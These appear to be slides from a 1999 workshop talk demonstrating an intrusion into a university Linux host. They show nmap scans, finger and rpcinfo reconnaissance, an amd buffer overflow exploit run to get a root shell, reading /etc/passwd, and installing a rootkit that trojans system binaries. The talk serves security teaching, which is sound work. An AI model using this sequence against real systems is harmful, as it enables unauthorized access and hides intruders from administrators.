concert99
advertisement
Intrusion demonstration
Part I
Postech
PLUS
Taeho Oh (PLUS015)
ohhara@postech.edu
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
Contents
• Scan wide area network
– Using powerful network scanner, nmap
– Find the running hosts in the network
– Gather the host information
• Get root permission from the target host
• Hide himself from the admin
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
Scan wide area network (1)
• Using powerful network scanner, nmap
– nmap can do ftp bounce scan, stealth scan, OS
prediction, and so on.
– http://www.insecure.org/nmap
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
Scan wide area network (2)
• Find the running hosts in the network
[ root@ohhara ~ ] {1} # nmap -sP "141.223.xxx.*"
Host (141.223.xxx.0) appears to be up.
Host
(141.223.xxx.0) seems to be a subnet broadcast address
(returned 111 extra pings). Skipping host.
Host kwxnxoo.postech.ac.kr (141.223.xxx.7) appears to be up.
Host xojx.postech.ac.kr (141.223.xxx.9) appears to be up.
( . . . )
Host victim.postech.ac.kr (141.223.xxx.75) appears to be up.
Host xstxos.postech.ac.kr (141.223.xxx.77) appears to be up.
Host anxelx.postech.ac.kr (141.223.xxx.78) appears to be up.
Host mxrlxns.postech.ac.kr (141.223.xxx.79) appears to be up.
Host (141.223.xxx.99) appears to be up.
Host (141.223.xxx.255) appears to be up.
Host
(141.223.xxx.255) seems to be a subnet broadcast address
(returned 93 extra pings). Skipping host.
Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 2
seconds
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
Scan wide area network (3)
• Gather the host information
[ root@ohhara ~ ] {2} # nmap -I -O 141.223.121.75
Interesting ports on victim.postech.ac.kr (141.223.xxx.75):
Port
State
Protocol Service
Owner
21
open
tcp
ftp
root
23
open
tcp
telnet
root
25
open
tcp
smtp
root
53
open
tcp
domain
root
79
open
tcp
finger
root
80
open
tcp
http
nobody
( . . . )
6000
open
tcp
X11
root
TCP Sequence Prediction: Class=random positive increments
Difficulty=2098031 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 2.2.2
Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
Scan wide area network (4)
• Gather the host information
[ root@ohhara ~ ] {3} #
[141.223.xxx.75]
Login
Name
Phone
kotaeji
Kim Taehyung
[ root@ohhara ~ ] {4} #
program vers proto
100000
2
tcp
100000
2
udp
( . . . )
100021
1
udp
100021
3
udp
100021
1
tcp
100021
3
tcp
300019
1
tcp
300019
1
udp
finger @141.223.xxx.75
Tty
Idle
Login Time
Office
Office
/0
20:46 Oct 27 19:41
rpcinfo -p 141.223.xxx.75
port
111 rpcbind
111 rpcbind
1026
1026
1024
1024
878
879
3rd CONCERT Workshop Nov. 1999
nlockmgr
nlockmgr
nlockmgr
nlockmgr
amd
amd
Taeho Oh/PLUS
Get root permission from the
target host
• Get root with amd buffer overflow exploit
[ root@ohhara ~ ] {5} # ./amd-ex 141.223.xxx.75
Attack 141.223.xxx.75
amq: could not start new autmount point: Connection timed out
Connect to the shell
Linux victim 2.2.5-22 #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknown
uid=0(root) gid=0(root)
id
uid=0(root) gid=0(root)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
( . . . )
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
Hide himself from the admin
• Install rootkit
[ root@victim ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz
[ root@victim ~ ] {2} # cd ohhara-rootkit
[ root@victim ~/ohhara-rootkit ] {3} # ./install-ohhara-rootkit
• Trojan files of ohhara rootkit
– chgrp, chmod, chown, cp, ln, ls, mkdir, mknod,
netstat, ps, touch, dir, du, find, mkfifo, oldps,
top, vdir, fixdate, in.inetd, in.smbd, in.telnetd,
pam.pwdb.so
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
